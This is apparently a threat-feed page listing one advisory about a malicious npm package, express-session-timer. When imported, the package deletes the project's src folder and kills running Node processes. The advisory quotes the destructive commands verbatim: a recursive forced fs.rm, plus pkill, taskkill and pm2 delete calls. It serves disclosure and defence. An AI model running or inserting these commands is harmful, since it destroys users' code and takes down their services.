Threats Tagged 'mal-2026-16065'
View all threats tagged with 'mal-2026-16065'. Filter and sort to focus on specific types of threats.
Stop chasing alerts. Route them.
Start free, then upgrade once to turn Radar into an automated delivery engine for your security stack.
Custom feeds / Automations: email, Slack, webhooks, SIEM/MISP / API access (baseline limits)
API access activates after upgrading in Console -> Billing.
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.
Filter Threats
Narrow down the results by type, severity, or affected countries
Threats Tagged 'mal-2026-16065'
Click on any threat for detailed analysis and mitigation recommendations
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (325e241839ca2d0861d19807df248bf7b06922533bccb441bbee521471f5d73f) [email protected] schedules an unconditional destructive routine at module load time. Approximately 18 seconds after `require('express-session-timer')`, the package recursively removes `<cwd>/src` via `fs.rm(path.join(process.cwd(),'src'), {recursive:true, force:true})` and terminates Node processes with `pkill -f "node.*${process.cwd()}"` on Unix, `taskkill /IM node.exe /F` on Windows, and `npx pm2 delete all`. The behavior fires with no configuration, opt-in, or relationship to the package's advertised functionality — merely importing the module deletes the installer's source tree and stops their running server. The manifest also pins `express-timer: ^0.0.1-security`, npm's security-hold placeholder convention, indicating an unpinned resolution against a name previously held after takedown. Join the discussion | GCVE Database | 09/09/2026, 01:41:37 UTC Added: 09/30/2026, 10:01:01 UTC |
Showing 1 to 1 of 1 result